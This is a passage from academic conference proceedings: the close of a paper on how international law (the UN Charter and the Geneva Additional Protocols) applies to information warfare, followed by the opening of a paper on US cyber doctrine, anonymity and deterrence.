clearly. That might be the main reason why the use of force prohibition encounters difficulty when<br />

translated into the IW context. Not all hostile acts are uses of force. Traditionally, states defined ‘force’<br />

in terms of the instrument used, including ‘armed’ force within the prohibition, but excluding economic<br />

and political forms of coercion. This distinction reflects an effort to proscribe those acts most likely to<br />

interfere with the U.N.’s primary purpose: maintaining international peace and security.<br />

The classic ‘instrumentality’ approach argues that IW does not qualify as armed force because it lacks<br />

the physical characteristics associated with military coercion (Hollis 2007). The analysis looks at<br />

whether there is kinetic impact: some type of explosion or physical force. The Charter was created in<br />

the days of weapons that provided blast, heat, and fragmentation damage, so it is clear that these<br />

types of kinetic weapons were exclusively present in the minds of the drafters.<br />

Still, some types of cyber attacks can be determined to be uses of force. Since the determination of a<br />

use of force requires that a weapon be used, there first must be a method of analogizing IW attacks to<br />

weapons. A very good method could be the one proposed by Ian Brownlie, which shifts the traditional<br />

use of force analysis from a purely kinetic analysis, based on physical force being applied to the<br />

target, to a result-based analysis, evaluating IW attacks is not limited to focusing on the method of the<br />

attack (Brownlie 1963). A result-based analysis requires looking at whether there is a kinetic result,<br />

that cause damage or injury, rather than whether the weapon itself is kinetic.<br />

The text of the U.N. Charter offers additional support for the ‘instrumentality’ view in Article 41, which<br />

states that ‘measures not involving the use of armed force’ include ‘complete or partial interruption of<br />

(…) telegraphic, radio, and other means of communication’ (Charter of the United Nations, Art.41).<br />

Clearly, ‘other means of communications’ fairly encompasses computer communications and<br />

communication over computer networks. It seems that Article 41 permits countries to deprive another<br />

nation of its communications, as well as interrupting communications by manipulation of the target<br />

country's data such that it is corrupt and untrustworthy, altering the data to render it useless for that<br />

nation's purpose, and actually altering the data such that it achieves an intended purpose for the<br />

aggressor nation (DiCenso 2000). Although such measures sound like fair game for IW, the<br />

provisions of Article 41 still require the Security Council to decide what measures are to be employed<br />

under that article, including force and actions that do not include armed force.<br />

In order to retain its effectiveness, the Charter’s interpretations must evolve to some degree. The<br />

extent to which this happens is important in applying use of force analysis under Article 2(4) as new<br />

types of warfare develop. If the definition of the ‘use of force’ is static, then the ban on the use of force<br />

gradually will become less effective as new interstate actions occur beyond the boundaries of what<br />

the drafters considered (Barkham 2001).<br />

Difficulty in characterizing certain forms of information warfare as ‘force’ or ‘aggression’ under<br />

international law does not mean that international legal institutions cannot respond to such attacks.<br />

For example, Chapter VII of the U.N. Charter gives the UN Security Council the authority and<br />

responsibility to determine the existence of any ‘threat to the peace’ or acts of aggression (Charter of<br />

the United Nations, Article 39) and the Council can recommend and lead responses to that (Charter of<br />

the United Nations, Article 40). Many information attacks that may not constitute ‘force’ or ‘aggression’<br />

could certainly be considered threats to the peace and thus subject to Security Council action,<br />

perhaps including the use of military force. After all, anything that would anger a government to the<br />

point that it might feel the need to resort to military action could thus threaten the peace, even if the<br />

provocative action was not technically illegal (Greenberg 1998).<br />

Of particular interest for IW analysis is Article 51 of the U.N. Charter, the only exception to the rule<br />

stated in Article 2(4). According to Article 51, states can use force pursuant to the inherent right of<br />

self-defense in response to an armed attack: ’Nothing in the present Charter shall impair the inherent<br />

right of individual or collective self-defense if an armed attack occurs against a Member of the United<br />

Nations, until the Security Council has taken measures necessary to maintain international peace and<br />

security’ (Charter of the United Nations, Art.51). As sole authorization of unilateral use of force outside<br />

the U.N. Charter security system, this provision responds to the reality that the international<br />

community may not be able to react quickly enough to armed aggression to forestall attack on a victim<br />

state. It therefore permits states and their allies to defend themselves until the international help<br />

arrives pursuant to Chapter VII.<br />

202


Alexandru Nitu<br />

Article 51 restricts a state’s right of self-defense to situations involving ’armed attack’, a narrower<br />

category of act than Article 2(4)’s ’use of force’. Although coercion not involving armed force may<br />

violate Article 2(4) and result in action under Article 39, it does not follow that states may also react<br />

unilaterally pursuant to Article 51. This narrowing plainly reflects the Charter’s preference for<br />

community responses over individual ones, even to threats to peace (Schmitt 1999). In the case of a<br />

IW attack, it is also a prudent approach due to the difficulty states may have in identifying the correct<br />

source of an attack.<br />

The main problem IW poses for Article 2(4) does not derive from its large-scale applications, but from<br />

attacks that do not destroy life or property, such as subversion of property, electronic blockades, and<br />

incursions. The large-scale attacks are similar to conventional methods of warfare and fit comfortably<br />

within traditional use of force analysis. The lower-level attacks present the problem when analyzed<br />

under Article 2(4) because they threaten to erase the distinction between acts of force and acts of<br />

coercion. The severity of an IW attack might not be identified promptly, so it would not be feasible to<br />

require a victim to conduct a damage assessment to determine whether an IW penetration were a use<br />

of force or merely of coercion. (Barkham 2001)<br />

3. International legal limits on IW<br />

3.1 Limits on the use of weapons<br />

Many of the international legal provisions regarding armed conflicts are found in the 1949 Geneva<br />

Conventions and the 1977 Additional Protocols to the Geneva Conventions. The Geneva<br />

Conventions, with their focus on the protection of persons in enemy hands, are of some relevance to<br />

IW. Without reference to specific weapons, the Additional Protocols (AP) address various methods<br />

and means of warfare in general terms, thus being able to present a framework for the use of IW.<br />

In order for International Humanitarian Law (IHL) to apply to a particular armed conflict, neither formal<br />

declaration of war, nor recognition of a state of war is required. Instead, the requirements of the law<br />

become applicable as from the actual opening of hostilities. An international armed conflict is<br />

perceived as any difference arising between two States and leading to the intervention of armed<br />

forces, even if one of the Parties denies the existence of a state of war (Pictet 1952).<br />

There is no doubt that an armed conflict exists and IHL applies once traditional kinetic weapons are<br />

used in combination with new methods of IW. The most difficult situation, as far as applicability of IHL<br />

is concerned, would be the one where the first, or the only hostile acts are conducted by means of IW.<br />

The question is if this type of conflict depends on the type of attack in order to be qualified as<br />

constituting an armed conflict within the meaning of the 1949 Geneva Convention and the Additional<br />

Protocols.<br />

Same as in the U.N. Charter’s case, the fact that IW developed only after the adoption of the<br />

Protocols does not exclude their applicability. The first Additional Protocol to the Geneva Conventions<br />

made specific reference for consideration of new weapons. Article 36 of Additional Protocol I (AP I) is<br />

a strong indicator that the drafters of AP I anticipated the application of its rules to new developments<br />

of methods and means of warfare. This provision requires that ‘In the study, development, acquisition<br />

or adoption of a new weapon, means or method of warfare, a High Contracting Party is under an<br />

obligation to determine whether its employment would, in some or all circumstances, be prohibited by<br />

this Protocol or by any other rule of international law applicable to the High Contracting Party’<br />

(Protocol Additional to the Geneva Conventions 1977). This statement obligates a nation at least to<br />

consider the laws of armed conflict before employing IW means. That consideration should focus on<br />

both the means of force and perhaps more importantly on the effects.<br />

Consequently, the fact that a particular military activity constituting a method of warfare is not<br />

specifically regulated does not mean that it can be used without restrictions. Based on that, nothing<br />

precludes assuming that the more recent forms of IW, which do not involve the use of traditional<br />

weapons, are subject to IHL just as any new weapon or delivery system has been so far when used in<br />

an armed conflict. (Dörmann 2004)<br />

Another fundamental rule of warfare, found in Article 35 (1) of AP I, states that ‘the right of the Parties<br />

to the conflict to choose methods or means of warfare is not unlimited’ (Protocol Additional to the<br />

Geneva Conventions 1977). So far, hostilities have involved physical violence and kinetic energy<br />

203


Alexandru Nitu<br />

leading to human casualties or material damage. In the case of IHL, the motivation for the application<br />

of the law is to limit the damage and provide care for the casualties. This would support an expansive<br />

interpretation of when IHL begins to apply. If a cyber attack is directed against an enemy in order to<br />

cause physical damage or loss of life, it can hardly be disputed that such an attack is in fact a method<br />

of warfare and is subject to limitations under IHL. (Dörmann 2004)<br />

3.2 The principle of distinction<br />

Just as information warfare attacks may be difficult to encompass within the ‘use of force’ concept, it<br />

may be also difficult to define their targets as military (and thus generally legitimate targets) or civilian<br />

(generally forbidden). The dual-use nature of many telecommunications networks complicates the<br />

questions of the applicability of IHL as a constraint on information warfare, because the intangible<br />

damage that cyber attacks cause may not be the sort of injuries against which the humanitarian law of<br />

war is designed to protect noncombatants. (Greenberg 1998)<br />

The definition of the term “attack” is of decisive importance for the application of the various rules<br />

giving effect to the principle of distinction and for most of the rules providing special protection for<br />

certain objects. In accordance with Art. 49 (1) of AP I, ‘attacks’ means acts of violence against the<br />

adversary, whether in offence or in defense (Protocol Additional to the Geneva Conventions 1977). If<br />

the term ‘acts of violence’ denotes only physical force, the concept of ‘attacks’ excludes dissemination<br />

of propaganda, embargoes or other non-physical means of psychological, political or economic<br />

warfare. (Dörmann 2004)<br />

Based on that understanding and distinction, cyber attacks through viruses, worms, logic bombs etc.<br />

that result in physical damage to persons, or damage to objects that goes beyond the computer<br />

program or data attacked can be qualified as ‘acts of violence’ and thus as an attack in the sense of<br />

IHL. From this point of view, it is helpful to look at how the concept of attack is applied to other means<br />

and methods of warfare. There is general agreement that, for example, the employment of biological<br />

or chemical agents that does not cause a physical explosion, such as the use of asphyxiating or<br />

poisonous gases, would constitute an attack (Dörmann 2004).<br />

If one admits that employing a IW method constitute an attack, AP I imposes:<br />

The obligation to direct attacks only against "military objectives" and not to attack civilians or<br />

civilian objects; (Protocol Additional to the Geneva Conventions 1977, Art. 48, 51 (2), 52)<br />

The prohibition of indiscriminate attacks, including attacks that may be expected to cause<br />

excessive incidental civilian casualties or damages; (Protocol Additional to the Geneva<br />

Conventions 1977, Art. 51 (4), (5))<br />

The requirement to take the necessary precautions to ensure that the previous two rules are<br />

respected, (Protocol Additional to the Geneva Conventions 1977, Art. 57) in particular the<br />

requirement to minimize incidental civilian damage and the obligation to abstain from attacks if<br />

such damage is likely to be excessive to the value of the military objective to be attacked;<br />

(Protocol Additional to the Geneva Conventions 1977, Art. 51 (5)(b), 57 (2)(a)(ii) and (iii))<br />

These rules operate in exactly the same way whether the attack is carried out using traditional<br />

weapons or IW techniques. Problems that arise in applying these rules are therefore not necessarily<br />

unique to IW. They are more related to the interpretation of, for example, what constitutes a military<br />

objective or which collateral damage would be excessive.<br />

4. Legal perspectives on IW<br />

The laws of war always faced two challenges. The first was that war's confrontational nature and<br />

tremendously high stakes often frustrated efforts to set reasonable limits on behavior. Fortunately, the<br />

international community has generated international conventions and war crimes tribunals to solve<br />

this problem.<br />

The laws of war also face a second challenge, which is how to adapt these laws to technological<br />

change. This dynamic itself is as old as civilization, but it became more acute in the last one hundred<br />

years, since technological progress has accelerated. The result is that weapons are developing much<br />

faster than international law, and there is every reason to believe that this trend will continue to<br />

accelerate in the future.<br />

204


Alexandru Nitu<br />

As IW strategy and technology evolve, international law scholars will have to fit this new kind of<br />

warfare into an analytical framework developed to address a different conception of war.<br />

First, the U.N. Charter and other existing treaty regimes do not create a clear legal prohibition of many<br />

types of IW attacks. For international law effectively to address IW attacks there must be established<br />

a correspondence between terms like ‘use of force’, ‘armed attack’ or ‘armed aggression’ and IW<br />

methods and means of combat. Also, it would be necessary to set limits to IW activities similar to the<br />

classic jus in bello principles, like just war, discrimination or proportionality.<br />

The second, and the more difficult part, is to find a way to solve the practical problems associated<br />

with both launching and defending against cyber attacks, including the fundamental issue of<br />

attribution and in particular state responsibility for cyber attacks. It is technically challenging to localize<br />

the physical place from which such an act originates. But even if the origin of an attack can be<br />

localized within a particular state, it would be challenging to determine whether the attacker was<br />

acting in an individual capacity, or on behalf of a criminal organization, the government or armed<br />

forces.<br />

Just as the identity of the attacker raises difficult questions for any potential IW treaty, so does the<br />

identity of the victim. In an IW context, it becomes necessary to ask whether an attack on a company<br />

or an institution is an attack on a whole country. It is not necessarily clear that the state in whose<br />

territory the injured party resides is the injured state. In a conventional attack, the country where the<br />

attack is located has been attacked because its territorial integrity has been violated, but cyberspace<br />

is not a customary arena over which states may exercise such control.<br />

From a humanitarian law perspective, it would be essential to be able to ‘mark’ in some way the<br />

information systems used to maintain the viability of critical social infrastructure facilities. In the<br />

physical world, some of these facilities (such as hospitals) display a distinctive sign, indicating their<br />

protected status. Such identifying signs are absent in cyberspace, nor do criteria exist for designating<br />

these systems as critical infrastructure.<br />

5. Conclusions<br />

Because of the newness of much of the technology involved, no provision of international law<br />

explicitly addresses to information warfare. This absence of prohibitions is significant because, as a<br />

crudely general rule, that which international law does not prohibit it permits. But the absence is not<br />

dispositive, because even where international law does not address particular weapons or<br />

technologies, its general principles may apply to the use of those weapons and technologies<br />

(Greenberg 1998).<br />

Although the existing body of international law does not necessarily provide definitive and universally<br />

accepted answers to the legal issues that Information Warfare development rises, it does provide a<br />

structure by which these issues could be addressed and analyzed. However, in order to apply existent<br />

norms to IW, it is necessary to accept the consequence-based interpretations of “armed conflict” and<br />

“attack”. In the absence of such understandings, the applicability, and therefore adequacy, of presentday<br />

humanitarian law principles would come into question. The consideration of IW in the context of<br />

jus ad bellum also leads to consequence-based interpretation.<br />

Devising a system of international law adressing Information Warfare or Information Operations could<br />

rectify many of the deficiencies of the current legal system and provide states with additional<br />

functional benefits that do not currently exist. First, it can remedy uncertainty. Drafting new rules<br />

provides an opportunity to rectify translation problems that plague IW under the law of war. It could<br />

give states and their militaries a clear sense of the rules of engagement in the information age.<br />

A dedicated law would allow states not simply to choose among available interpretations of the<br />

prohibition on the use of force, but to craft a standard tailored to IW without the additional inclusion<br />

problems that currently exist. Similarly, states could set the bar for when IW triggers the civilian<br />

distinction requirement and address whether any or all information networks constitute legitimate<br />

military objectives.<br />

Disclaimer:The views, opinions, and recommendations contained in this analysis are those of the<br />

author and should not be construed as an official position, policy, or decision of the Romanian<br />

Intelligence Service<br />

205


6. References<br />

Alexandru Nitu<br />

Barkham, J. (2001), Information Warfare and International Law on the Use of Force, New York University Journal<br />

of International Law and Politics, vol. 34, pp. 57-113.<br />

Brownlie, I. (1963), International Law and the Use of Force by States, Clarendon Press, Oxford<br />

Charter of the United Nations and Statute of the International Court of Justice (1985), United Nations,<br />

Department of Public Information<br />

DiCenso, D. (2000), Information Operations: An Act of War?, Air & Space Power Chronicles. Available at<br />

http://www.airpower.maxwell.af.mil/airchronicles/cc.html.<br />

Dörmann, K. (2004), Applicability of the Additional Protocols to Computer Network Attacks, International Expert<br />

<strong>Conference</strong> on Computer Network Attacks and the Applicability of International Humanitarian Law,<br />

Stockholm, Available at http://www.icrc.org/web/eng/siteeng0.nsf/html/68LG92<br />

Greenberg, L.T., Goodman, S.E., Soo Hoo, K.J. (1998), Information Warfare and International Law, National<br />

Defense University Press. Available at http://www.iwar.org.uk/law/resources/iwlaw/iwilindex.htm<br />

Hollis, Duncan B. (2007), Why States Need an International Law for Information Operations. Lewis & Clark Law<br />

Review, Vol. 11, p. 1023, Temple University Legal Studies Research Paper No. 2008-43. Available at<br />

http://ssrn.com/abstract=1083889<br />

Joint Chiefs of Staff (1998), Joint Doctrine for Information Operations, Joint Publication 3-13.<br />

Pictet, J. (1952), Commentary on the Geneva Convention for the Amelioration of the Condition of the Wounded<br />

and Sick in Armed Forces in the Field, International Committee of the Red Cross, Geneva.<br />

Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of<br />

International Armed Conflicts (Protocol I), 8 June 1977. Available at http://www.icrc.org<br />

Schmitt, Michael N. (1999), Computer Network Attack and the Use of Force in International Law: Thoughts on a<br />

Normative Framework, Columbia Journal of Transnational Law, Vol. 37, 1998-99. Available at:<br />

http://ssrn.com/abstract=1603800<br />

Shackelford, S.J. (2009), From Nuclear War to Net War: Analogizing Cyber Attacks in International Law, Berkeley<br />

Journal of International Law, Vol. 25, No. 3, pp. 191-250.<br />

206


Cyberwarfare and Anonymity<br />

Christopher Perr<br />

Auburn University, USA<br />

cwp0002@auburn.edu<br />

Abstract: Public policy and strategy do not keep up to date with technology. There is generally a lag time<br />

between the release and application of a technology till a shortcoming is observed. Once a shortcoming is<br />

revealed it is a race to address that potential weakness with improved policy, updated strategy, a technological<br />

initiative to combat the shortcoming, or a necessary combination of all methods. The invent of computer reliant<br />

and networked systems has created a modern arms race which has seen more innovation and more need for<br />

updated policy and strategy than any other period in history, yet the United States continues to fall behind in this<br />

arms race. When security cannot be verified, but only risk mitigated, it is time to think deterrence. Unfortunately,<br />

deterrence falls apart when you cannot identify the perpetrator behind attacks. This paper will look at the role that<br />

information has played in previous conflicts, as well as the modern strategy towards protecting the United States<br />

in cyberspace, and will draw a singular conclusion as to the best course of action towards improving our security.<br />

Through a mix of policy, strategy, and technology the anonymity which attackers use as a shield needs to be<br />

eliminated in order to allow room for a strong policy of deterrence with a verifiable response. In establishing the<br />

means to identify our attackers and provide serious recourse cybersecurity can be greatly improved for the<br />

United States.<br />

Keywords: information warfare, security, policy, strategy, history, information security<br />

1. The motivation<br />

“We’re already at war in cyberspace; have been for many years.”<br />

Gen Ronald E. Keys, Commander, Air Combat Command<br />

On 6 September 2007 Fulghum reported that Israeli aircraft flew into Syria from Turkey and destroyed<br />

a construction site (2007). The site was thought to have contained equipment for the refinement of<br />

weapons grade nuclear material provided by North Korea.<br />

The interesting part of this story for the purposes of this paper is that Syria, a country with an<br />

advanced anti-air defense system purchased from Russia, did not even see the 10 F-15Is appear on<br />

their radar. These are not stealthy aircraft, and with weapons hanging off the wings, should have been<br />

easily spotted on radar. Further, troops were massing at Israel’s borders signaling a possible attack.<br />

Syria was expecting something. So what happened?<br />

The thought is that the Israeli’s were able to somehow disable the radar sites and to provide a window<br />

where the jets could get in, bomb the target, and leave without threat. Was it a trap door in the radar<br />

software? Did the Israeli’s use a special UAV to signal blank radar screen to the radar sites? They<br />

haven’t said yet, and the only clear part is that Israel ‘owned’ those sites for a single night and proved<br />

the strength of cyber warfare.<br />

Unfortunately, if the U.S. were in this tale we would be more like Syria than Israel.<br />

2. Open source<br />

Due to publication constraints, and the desire to stay at the unclassified level, this paper will deal only<br />

with open resources.<br />

3. The (not so) recent history of information operations<br />

“It is pointless to deal with enemy military forces if they can be bypassed by strategy or<br />

technology.”<br />

Col John A. Warden III, USAF, Retired<br />

Net-centric warfare has become a much bandied about buzzword in the modern military vernacular. A<br />

simple definition of net-centric warfare from the Office of Force Transformation (2005) is:<br />

“the translation of an information advantage, enabled in part by information technology,<br />

into a competitive war fighting advantage through the use of well-informed geographically<br />

dispersed forces.<br />

207


Christopher Perr<br />

Historical examples of this can be pointed to before the term ‘IT’ was even coined, one such being<br />

General William T. Sherman’s use of the telegraph to effectively shorten the kill chain of his day.<br />

The kill chain is how forces find, fix, track, target, engage, and assess an enemy force today. It is a<br />

loop where the exit is the destruction of your target. In Sherman’s time the kill chain was shortened by<br />

drastically cutting the amount of time it took to communicate with his geographically separated forces.<br />

None of these terms were used in Sherman’s time, but the concept is not new.<br />

According to Arquilla (2007), Sherman is also useful for another example. His dependence on the<br />

telegraph and the lack of security was highlighted when the Confederate forces started to attack the<br />

lines that carried the vital communications. This caused troops to be pulled from the battlefield for<br />

protection, and while it may have been too late in the war to make a difference, caused a dilution of<br />

the Union’s forces. The telegraph showed how the kill chain can be thought of not in distances but in<br />

time to decision making, and was also shown to be a possible center of gravity to which doctrine must<br />

be modified to defend.<br />

History is rife with examples of how technology has affected the way we think about and execute<br />

conflict. The telegraph is historically the single largest increase in communication bandwidth. As its<br />

was recognized as a powerful tool for command and control, dependence on the telegraph as the only<br />

manner for controlling troops was recognized as a possible center of gravity and weakness to be<br />

exploited<br />

4. The (more) recent history of information operations the environment of<br />

information operations<br />

“An information war is inexpensive, as the enemy country can receive a paralyzing blow<br />

through the Internet, and the party on the receiving end will not be able to tell whether it<br />

is a child’s prank or an attack from its enemy.”<br />

Wei Jincheng, excerpted from the Military Forum column, Liberation Army Daily, 25 June<br />

1996<br />

The First Gulf War is widely viewed as a major success according to Campen (1992). The<br />

preparations involved repetitive rehearsals, planning, critique, and then more rehearsal. The rest of<br />

the world watched as, what was at the time, the fourth largest force in the world got rolled over in a<br />

matter of days. That was 1991, and even though the communication network was almost thrown<br />

together the tactics and techniques used proved to be game changing.<br />

Baucon (2010) notes that by 1995 forces around the globe had taken such a notice to the<br />

revolutionary way that U.S. forces had used modified blitzkrieg maneuvers combined with supreme<br />

command and control enabled by a technical advantage that those forces had changed their strategy<br />

and force composition. It was clear that smart weapons and use of information warfare had made a<br />

profound effect<br />

Fast forward a bit, and a lot has happened since the Gulf War. In 2007 a conflict arose in Estonia with<br />

Russia over the existence and placement of the Bronze Soldier of Tallinn. This spawned what the<br />

Russian government called a ‘online response by patriotic individual citizens’. Estonia, a ‘highly<br />

connected web friendly’ country, was now the victim of various bot-net and denial of service attacks<br />

which brought the internet in that country to a halt. Waterman (2007) wrote that the attack was<br />

characterized by Professor James Hendler, a former chief scientist at DARPA, as<br />

“...more like a cyber riot than a military attack”<br />

Speculation seems to imply that the Russian government sought out the help of organized crime and<br />

individual hackers to carry out the attacks. The effect was the same as a conventional siege, and the<br />

attacks were reported as a ‘crime’ by the Russians. The Estonian government requested aid in<br />

investigation as outlined in Mutual Legal Assistance Treaty. Russia declined their requests (Leyden,<br />

2008)<br />

Other cases to look at are the cyber attacks perpetrated by North Korea on the United States and<br />

South Korea in July of 2009. On the 4th of July North Korea attacked a large number of government<br />

websites with bot-net and DDoS attacks seeking suspected political bargaining power. The attacks<br />

were felt mildly here in the U.S. due to filtering addresses and distribution of website sources, but the<br />

208


Christopher Perr<br />

attacks again helped to show how vulnerable we are to even unsophisticated cyber attacks (U.S. eyes<br />

N. Korea for ‘massive’ cyber attacks, 2010).<br />

5. The current state of our cyber doctrine<br />

It has become appallingly obvious that our technology has exceeded our humanity.<br />

Albert Einstein<br />

The opening of this paper ends with a pretty controversial statement, and is done so with a purpose.<br />

The case with Iran and Syria show how a dependence on technology can seriously threaten a nation.<br />

Evidence exists to show that the United States might be in a position where we are overly dependent<br />

on technology in key areas with a limited ability to defend ourselves. Our current policies regarding<br />

cyber warfare serve as the main cause.<br />

The most recent example to support this statement is in the written answers which General Keith<br />

Alexander, the nominee for commander of the new Cyber Command, provided to the Senate Armed<br />

Services Committee on 15 April 2010. In one question he answered<br />

“President Obama’s cybersecurity sixty-day study highlighted the mismatch between our<br />

technical capabilities to conduct operations and the governing laws and policies, and our<br />

civilian leadership is working hard to resolve the mismatch (Markoff, 2010).”<br />

General Alexander’s response highlights an ongoing issue in the Department of Defense and, since<br />

the vulnerability to the United States extends into the civil realm, in public policy as well. General<br />

Alexander also speaks to the large gap created by having very effective offensive cyber capabilities<br />

without developed defensive capabilities.<br />

The 2003 Information Operations Roadmap served as the initial White House level guide for how the<br />

armed forces conduct information operations (Miller, 2010). This document is very general and at a<br />

level above specifics about cyber-warfare, but some important information can be gleaned from it.<br />

First, cyber warfare is treated as an extension of information and conventional operations. Second, it<br />

was decided that our current policy and force preparedness was not at a level capable of meeting the<br />

countries cyber needs. Third, the civil realm of cyber operations was almost completely ignored<br />

except to say that there could be some effect from operations and as such considerations should be<br />

weighed.<br />

The only other repeating theme in the document was to note the need to “deny, degrade, disrupt or<br />

destroy a broad range of adversary threats, sensors, command and control and critical support<br />

infrastructure.” This seems to assume that when cyber comes into play, it will be only against another<br />

country that has a similar dependence on technology as the United States. This document also<br />

highlights how the term “cyber war” can be incredibly limiting, and neglects a lot of the tactics and<br />

resources which could be utilized if cyber operations were not limited to ‘conventional war’ alone.<br />

The first main theme is vital to understand, and is echoed in a recent article in the Air and Space<br />

Power Journal “Cyber This, Cyber That...So What? (Trias, 2010)” This article discusses integrating<br />

cyberspace operations as well as counter cyberspace with everything from special operations to aerial<br />

refueling is greatly advocated. Due to the pervasive nature of cyberspace almost all doctrine should<br />

be looked at to at least include defensive elements of cyber security, and could probably benefit from<br />

looking to how offensive cyber operations could aid in mission effectiveness.<br />

The article also recognizes how slow going and agonizing the process of updating doctrine without<br />

clear policy guidance can be.<br />

“Air Force strategists are struggling to create doctrinal principles for cyber warfare in the<br />

form of Air Force Doctrine Document (AFDD) 2-11, “Cyberspace Operations,” now<br />

several years in draft.” (Trias, 2010)<br />

The reason the Air Force could be having such a difficult time is linked to our second issue. In<br />

response to the Information Operation Roadmap some major changes began to take place in the<br />

cyber realm. New commands and squadrons were stood up across the Department of Defense (DoD)<br />

in what from the outside looked like a power grab, and in eventual response it was decided that there<br />

needed to be a new joint command created to oversee cyber operations and defense, and to track<br />

capabilities and assets in the DoD.<br />

209


Christopher Perr<br />

This command is the new U.S. Cyber Command and was announced in June of 2009. Before that the<br />

Air Force was hoping to form their own combatant command, but instead settled for a numbered<br />

command. The Navy and Army have their own units as well. With all these new units confusion<br />

regarding responsibility is inevitable.<br />

The mission of U.S. Cyber Command is:<br />

“...to coordinate computer-network defense and direct U.S. cyber attack operations (US<br />

military prepares for ‘cyber command, 2010).”<br />

Unfortunately, this new command with a somewhat clear mission did not seem to solve all of the ills<br />

that cyberspace has created. In January of 2010 the Pentagon attempted to respond to a simulated<br />

cyber attack.<br />

“The results were dispiriting. The enemy has all the advantages: stealth, anonymity, and<br />

unpredictability. No one could pinpoint the country from which the attack came, so there<br />

was no effective way to deter further damage by threatening retaliation. What’s more, the<br />

military commanders noted that they even lacked the military authority to respondespecially<br />

because it was never clear if the attack was an act of vandalism, an attempt at<br />

commercial theft, or a state-sponsored effort to cripple the United States, perhaps as a<br />

prelude to conventional war (Markoff, 2010).”<br />

As U.S. Cyber Command has not officially stood up yet it can only be hoped that the response to a<br />

cyber attack would improve after a governing body has been established. Unfortunately, this still<br />

leaves a third problem in our cyber strategy. What about the civilian side?<br />

In March of this year a graduate student in Liaoning, China named Wang Jianwei authored a paper<br />

titled “Cascade-Based Attack Vulnerability on the U.S. Power Grid.” The paper actually had nothing to<br />

do with attacking the U.S. power grid, but instead was a technical exercise with the goal of increasing<br />

security for networked power grids. The paper still created cries of outrage and questions as to who<br />

was in charge of our grids well-being. The interesting part to take note of is that Jianwei chose the<br />

U.S. power grid because it had the most information available on the inner workings of the network<br />

(Markoff, 2010).<br />

At the same time, according to Nielsen Online, in August of 2009 almost 75% of the United States<br />

was listed as ‘users of the internet’ (Miniwatts Marketing Group, 2009). You can imagine that ‘internet<br />

user’ includes lots of activities like banking, social networking, commerce, and business. Without even<br />

mentioning necessities like the power grid or other services, the e-commerce sector alone was worth<br />

more than $100 billion in 2007. You can see why the civilian sector would have a vested interest into<br />

the handling of cybersecurity. The concern is that the DoD will dominate the area of cybersecurity and<br />

the civilian side will be forced to submit to harsh and sometimes arbitrary regulation.<br />

The answer to the concerns raised about the DoD’s dominance of cyber security and operations? The<br />

Department of Homeland Security will eventually be receiving a Director for Cybersecurity, and<br />

currently has in place an Office of Cybersecurity and Communications. Their specific responsibility is<br />

listed below.<br />

“The Office of Cybersecurity and Communications (CS&C) is responsible for enhancing<br />

the security, resiliency, and reliability of the nation’s cyber and communications<br />

infrastructure. CS&C actively engages the public and private sectors as well as<br />

international partners to prepare for, prevent, and respond to catastrophic incidents that<br />

could degrade or overwhelm these strategic assets (Department of Homeland Security,<br />

2010).”<br />

As of right now it could be said that none of that is taking place. Recently, when Google first feared<br />

that their operation in China had been hacked, they turned to the NSA, not the Department of<br />

Homeland Security, to help sort out the problem (Markoff, 2010). Where is the communication and<br />

organization for who deals with what? This is without even mentioning that the FBI and the Secret<br />

Service both have units that work in cyber security. The FBI is now also responsible for investigating<br />

cyber crime on U.S. companies even though the attack may have occurred well outside our borders<br />

(FBI probes cyber attack on Citigroup, 2010).With the convoluted policies and rapid changes it is easy<br />

to see where one might be confused. There is no clear guide as to who responds, or how.<br />

Unfortunately, that does not bode well for the defense of the United States. The best that can be said<br />

210


Christopher Perr<br />

about the current state of our cyber doctrine and policies is that we are rapidly improving, but aren’t<br />

there yet.<br />

6. The proposition<br />

“The dogmas of the quiet past are inadequate to the stormy present. The occasion is<br />

piled high with difficulty, and we must rise with the occasion. As our case is new, so we<br />

must think anew and act anew.”<br />

Abraham Lincoln, President of the United States<br />

Message to Congress, 1 December 1862<br />

When the nuclear bomb was unleashed on the world individual countries began seeking their own<br />

nuclear weapons. As a country it was difficult to feel safe without one. With a weapon so massive it<br />

was important that the person with ‘the bomb’ knew that you had the same capability, and that you<br />

would use it if necessary. Unfortunately, this strategy seems ripe to fall apart as the technology<br />

proliferates to anonymous parties. Cyberwar shares a lot in common with the development of strategy<br />

for nuclear weapons. It was a massive revolution in warfighting that spawned a new arms race.<br />

Unfortunately, anonymity is already a very serious issue. Anonymous parties are able to develop and<br />

use very powerful informational weapons, and there is little to identify them or to link them to a party<br />

that can be held accountable. On the bright side, while we cannot yet invent a safe nuclear bomb, we<br />

can invent a safe internet by making several improvements to the one we have now. Lets think of<br />

these improvements in the three ways t0 affect Cybersecurity: strategy, policy, and technological<br />

advancement.<br />

Strategy needs to be considered for both the short term and the long term, and is closely tied in to<br />

technological development. In the short term it is best to consider how to continue patching and<br />

modifying our current internet protocols to make a defensible position in cyberspace. This is basically<br />

applying some common rules in Cybersecurity. If it doesn’t need to be online, don’t put it online. If<br />

there are serious benefits to be gained by networking a system, such as applying networks to the<br />

power grid to facilitate more efficient generation of power, then by all means network the system but<br />

keep it as closed off and private as possible. Finally, when you do need to share something with the<br />

internet or transmit information keep classified information separate, secure the site as much as<br />

possible. Don’t forget to compartmentalize the system as much as possible, geographically distribute<br />

your network where appropriate, keep constant backups, and maintain an appropriate level of<br />

redundancy. For the short term, if these rules are applied judiciously, we just might make it out alive.<br />

Technological advancement and policy are going to be playing a smaller but still vital role in the short<br />

term. Technologically it would be impossible to create the defensible position without working to<br />

defeat and patch the vulnerabilities which the attacks are exploiting, and to track the perpetrators to<br />

the ultimate conclusion. To ignore current security flaws with the hope that the next update would fix<br />

close the gap would be to look the other way at our own peril, and to embolden the individuals or<br />

governments exploiting the flaws in the current system. In the short term, policy should be made that<br />

clearly defines the jurisdiction and responsibilities to the agencies and military bodies charged with<br />

defending the U.S.’s efforts in cyberspace. This effort is to include funding for the technology required<br />

to close the gaps in the security of our networked systems. It should also be noted that a clear<br />

offensive strategy needs to be explained in the short term, especially to note how to abolish the<br />

anonymity which antagonistic countries are operating under as a shield for their own offensive cyber<br />

operations. Funding for education also need to be taken under special consideration as these<br />

antagonistic nations are also funding and attracting top notch talent to their cause instead of working<br />

to develop peaceful relations in this realm.<br />

In the long term the hope is now that we can create a much safer and more stable future by applying<br />

thoughtful design. In this sense the long term goal of cyber strategy and technological development<br />

should be to create a network infrastructure which is more anticipatory against attack then reactive to<br />

